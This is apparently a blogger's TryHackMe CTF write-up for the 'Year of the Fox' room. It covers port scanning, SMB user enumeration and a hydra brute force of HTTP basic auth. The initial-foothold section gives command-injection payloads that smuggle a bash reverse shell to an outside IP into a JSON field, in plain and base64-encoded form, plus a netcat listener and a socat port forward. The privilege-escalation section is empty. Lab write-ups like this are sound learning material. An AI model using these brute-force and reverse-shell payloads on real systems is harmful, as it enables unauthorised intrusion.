Year of the Fox [Tryhackme]

✔️ Information gathering :

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.75.135 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.75.135:80
Open 10.10.75.135:139
Open 10.10.75.135:445
┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.75.135 -p 139,445,80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 02:15 EST
Nmap scan report for 10.10.75.135
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2021-12-05T07:15:58+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-05T07:15:58
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
┌──(root💀kali)-[~]
└─# smbclient -L 10.10.75.135
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
yotf Disk Fox's Stuff -- keep out!
IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
┌──(root💀kali)-[~]
└─# smbclient -U 'guest' \\\\10.10.75.135\\yotf
Enter WORKGROUP\guest's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
GET / HTTP/1.1
Host: 10.10.75.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
S-1-5-21-978893743-2663913856-222388731-1049 *unknown*\*unknown* (8)
S-1-5-21-978893743-2663913856-222388731-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)
  • fox
  • rascal
┌──(root💀kali)-[~]
└─# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.75.135 http-get -t 64
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-05 04:19:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.75.135:80/
[80][http-get] host: 10.10.75.135 login: rascal password: underground
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-05 04:20:19
Copy
┌──(root💀kali)-[~]
└─# dirsearch -u http://10.10.75.135 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 200
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 200 | Wordlist size: 20475Output File: /root/.dirsearch/reports/10.10.75.135/_21-12-05_05-24-11.txtError Log: /root/.dirsearch/logs/errors-21-12-05_05-24-11.logTarget: http://10.10.75.135/[05:24:12] Starting:
[05:25:36] 403 - 277B - /server-status

Task Completed
\";pwd \"
\";pwd\n

✔️ exploitation [initial foothold]

\";sh -i >& /dev/tcp/10.17.9.224/9001 0>&1\n
nc -lvnp 9001
\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n
{
"target":"\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n"
}

✔️ post exploitation :

port 22 (ssh) running locally

./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22

✔️ privilege escalation

--

--

--

enthusiast cyber security learner and penetration tester / ethical hacker , python programmer and in my free time you will find me solving CTFs

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Disable SELinux on CentOS 7 or CentOS 8

GeyserTimes for iOS Beta

4 user insights from exporting Hassl

IMPLIMENTING YOUR OWN OPERATING SYSTEM — Implement with C

Under The Hood Rendering In Flutter

Learn basics of Version Control & Git Commands in less than 10 minutes.

Why don’t more people learn to code?

All You Need to Know About Hybrid Cloud Strategy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Surya Dev Singh

Surya Dev Singh

enthusiast cyber security learner and penetration tester / ethical hacker , python programmer and in my free time you will find me solving CTFs

More from Medium

ARMssembly 0 [picoCTF]

TryHackMe Notes: BurpSuite: The Basics

Hack The Box — Grandpa

Hack The Box: Previse Writeup